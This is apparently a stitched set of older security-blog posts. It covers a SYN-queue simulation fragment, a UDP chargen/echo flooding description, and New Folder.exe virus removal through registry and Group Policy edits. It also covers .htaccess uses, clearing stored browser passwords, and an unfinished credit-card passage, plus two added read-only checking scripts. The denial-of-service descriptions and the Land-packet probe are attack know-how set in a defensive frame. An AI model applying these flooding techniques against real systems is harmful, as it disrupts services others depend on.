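        q.receive(1.5, "192.0.2.9", 40001, "SYN"),    # real client while the queue is full
        q.receive(2.0, "192.0.2.80", 80, "SYN"),      # Land packet: source is the server
        q.receive(40.0, "192.0.2.9", 40002, "SYN"),   # same client after the timeout
        q.receive(40.05, "192.0.2.9", 40002, "ACK"),
    ]
    return q, probes


if __name__ == "__main__":
    queue, probes = simulate()
    print(probes, queue.completed, queue.refused, queue.peak)
```

A sustained level of half-open entries near the backlog limit, together with refused SYNs from clients that normally connect, is the signal to alert on; counting per source address is of little use when the source addresses are bad.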




UDP Flooding


This kind of flooding is done against two target systems and can be used to stop the services offered by any of the two systems. Both of the target systems are connected to each other, one generating a series of characters for each packet received or in other words, requesting UDP character generating service while the other system, echoes all characters it receives. This creates an infinite non-stopping loop between the two systems, making them useless for any data exchange or service provision.

NEWFOLDER.EXE VIRUS


newfolder.exe virus-get rid of it
New Folder.exe is a virus that can damage your files and your computer. This virus disables Task Manager, the registry and Group Policy editing, so it becomes very difficult to work on the computer. It creates .exe files that use the folder icon. While this virus is running it uses more than 50% of your processor and slows down the computer. It also disables Folder Options and hides hidden files and folders.
How to delete this file
To delete this file, download the antivirus ESET NOD32. You can download it from here:
http://www.eset.com/download/index.php
Install this antivirus and remove the virus. After that, type gpedit in the Run window. In the user settings, disable those features which are not working. Now Task Manager and regedit start working again, but Folder Options is still missing. To enable it, open the registry by typing regedit in the command prompt, and search for the key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
You will see:

NoFolderOptions REG_DWORD 0x00000001 (1)
Delete this value or set it to 0.




Now everything is OK. Never click on this folder-type file again.

Enable/Disable taskmanager through registry


Enable / Disable Task Manager in Windows


Using Registry:


Open the registry by typing regedit in the Run box, and search for:




Hive: HKEY_CURRENT_USER


Key: Software\Microsoft\Windows\CurrentVersion\Policies\System


Name: DisableTaskMgr


Type: REG_DWORD


Value: 1 = Enable this key, that is, DISABLE Task Manager


Value: 0 = Disable this key, that is, don't disable; ENABLE Task Manager.
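To check both registry values named on this page (NoFolderOptions under Policies\Explorer and DisableTaskMgr under Policies\System) in one pass, the following added example reads them from HKEY_CURRENT_USER and lists the ones set to 1. It is not part of the original post; the function names are hypothetical, and off Windows the script falls back to a constructed "infected" state.

```python
try:
    import winreg  # standard library, present only on Windows
except ImportError:
    winreg = None

POLICIES = r"Software\Microsoft\Windows\CurrentVersion\Policies"

# (subkey under POLICIES, value name, feature hidden while the value is 1).
# Both value names are the ones discussed in the text.
WATCHED = [
    ("Explorer", "NoFolderOptions", "Folder Options"),
    ("System", "DisableTaskMgr", "Task Manager"),
]


def read_hkcu_dword(subkey, name):
    """Return the DWORD stored under HKEY_CURRENT_USER, or None if it is absent."""
    if winreg is None:
        raise RuntimeError("the live check needs Windows (winreg is unavailable)")
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, POLICIES + "\\" + subkey) as key:
            value, kind = winreg.QueryValueEx(key, name)
    except FileNotFoundError:
        return None  # key or value missing: the restriction is not set
    return value if kind == winreg.REG_DWORD else None


def audit_restrictions(reader=read_hkcu_dword):
    """List (registry path, feature) for every watched value currently set to 1."""
    findings = []
    for subkey, name, feature in WATCHED:
        if reader(subkey, name) == 1:
            findings.append((f"HKCU\\{POLICIES}\\{subkey}\\{name}", feature))
    return findings


if __name__ == "__main__":
    # Constructed state used only when the script is not run on Windows.
    infected = {("Explorer", "NoFolderOptions"): 1, ("System", "DisableTaskMgr"): 1}
    reader = read_hkcu_dword if winreg else (lambda s, n: infected.get((s, n)))
    for path, feature in audit_restrictions(reader):
        print(f"{feature} is disabled by {path}")
```

An empty result means neither restriction is set for the current user; the script only reads the registry and changes nothing.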




Using GROUP POLICY


If your regedit has been hacked, use these steps.





1)Click Start
2)Click Run
3)Enter gpedit.msc in the Open box and click OK
4)In the Group Policy settings window
5)Select User Configuration
6)Select Administrative Templates
7)Select System
8)Select Ctrl+Alt+Delete options
9)Select Remove Task Manager
10)Double-click the Remove Task Manager option or disable it.

Security Audit Log Is Full



The Event Log folder that contains this policy is available only in Group Policy objects associated with domains, OUs, and sites. The Event Log folder does not appear in the Local Computer Policy object. So we get this error message while logging in. To avoid this problem, do the following steps:



Audit Policy
To enable auditing of security related events:

1. Open the applicable Security Policy.

2. Expand Security Settings.

3. Within Security Settings, expand Local Policies to reveal the Audit, User Rights Assignment, and Security Options policies.

4. Click on the Audit Policy object. The right-hand details pane will reveal the configurable Audit Policy settings.

Credit Card And Internet



Credit Card,Internet And Hacking

In the previous article we learned about the internet and transaction security. In this article we will look at the security of credit card payments over the internet.

Encrypted credit-card numbers aren't valuable enough by themselves, however, to pay for the compute time spent to attack them. A few years ago someone attempted to sell a large collection of valid credit-card numbers to an undercover FBI agent, who bought them for the modest sum of $2.50 per number. That price hardly justifies the effort needed to decrypt

What is .htaccess file


What is .htaccess file
Monday, December 8, 2008 at 10:22 PM Posted by SONU MISHRA



.htaccess stands for HyperText Access file. This is the default name of the configuration file on the server side. It can also be placed in the directory we want to secure, as it provides the ability to customize configuration for requests to that particular directory.

Although .htaccess is only a file, it can change settings on the servers and allow you to do many different things, the most popular being able to have your own custom 404 error pages. .htaccess isn't difficult to use and is really just made up of a few simple instructions in a text file.

Use of .htaccess file

1)Authorization and Authentication.
.htaccess files are often used to specify the security restrictions for the particular directory, hence the filename "access." The .htaccess file is often accompanied by an .htpasswd file which stores valid usernames and their passwords.
2)Customized error responses
Changing the page that is shown when a server-side error occurs, for example HTTP 404 Not Found.
These are some of the most common errors:

401 - Authorization Required
400 - Bad request
403 - Forbidden
500 - Internal Server Error
404 - Wrong page
3)Cache Control
.htaccess files allow a server to control User agent caching used by web browsers to reduce bandwidth usage, server load, and perceived lag.
4)Rewriting URLs
Servers often use .htaccess to rewrite "ugly" URLs to shorter and prettier ones.
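For the authorization use listed first above, the following added example (not part of the original post) checks an .htaccess file for two common mistakes in password protection: a missing `Require` directive, without which Apache never asks for a password, and an .htpasswd file stored inside the web-served directory tree. The sample file contents, all paths and the function names are constructed for illustration.

```python
import posixpath

# Constructed .htaccess for a protected directory; every path is made up.
SAMPLE_HTACCESS = """\
# password-protect this directory
AuthType Basic
AuthName "Members only"
AuthUserFile /var/www/site/members/.htpasswd
ErrorDocument 404 /errors/notfound.html
"""

# The same file with both problems corrected (paths again made up).
FIXED_HTACCESS = SAMPLE_HTACCESS.replace(
    "/var/www/site/members/.htpasswd", "/etc/apache2/members.htpasswd"
) + "Require valid-user\n"

AUTH_DIRECTIVES = ("authtype", "authname", "authuserfile", "require")


def parse_directives(text):
    """Return {lower-cased directive name: argument string}, skipping comments."""
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        directives[parts[0].lower()] = parts[1].strip() if len(parts) > 1 else ""
    return directives


def check_auth(text, docroot):
    """List problems with the password protection set up in an .htaccess file."""
    directives = parse_directives(text)
    if not any(name in directives for name in AUTH_DIRECTIVES):
        return []  # this file does not try to restrict access
    problems = [f"missing {name}" for name in AUTH_DIRECTIVES if name not in directives]
    userfile = posixpath.normpath(directives.get("authuserfile", "").strip('"'))
    root = posixpath.normpath(docroot)
    if "authuserfile" in directives and (userfile + "/").startswith(root + "/"):
        problems.append("password file is inside the document root")
    return problems


if __name__ == "__main__":
    print(check_auth(SAMPLE_HTACCESS, "/var/www/site"))
    print(check_auth(FIXED_HTACCESS, "/var/www/site"))
```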

How to remove internet remembered passwords



Where Internet Explorer Stores Passwords


Internet Explorer stores the username and password, if the user chooses, for the user's convenience. This is very useful for us. But for one reason or another, sometimes we need to remove the stored password. Deleting the history and cookies doesn't clear the password. To delete the password, go to 'Internet Options', 'Content', and the 'AutoComplete' tab.



Click on 'Clear Password' to remove the stored password.

Enjoy.....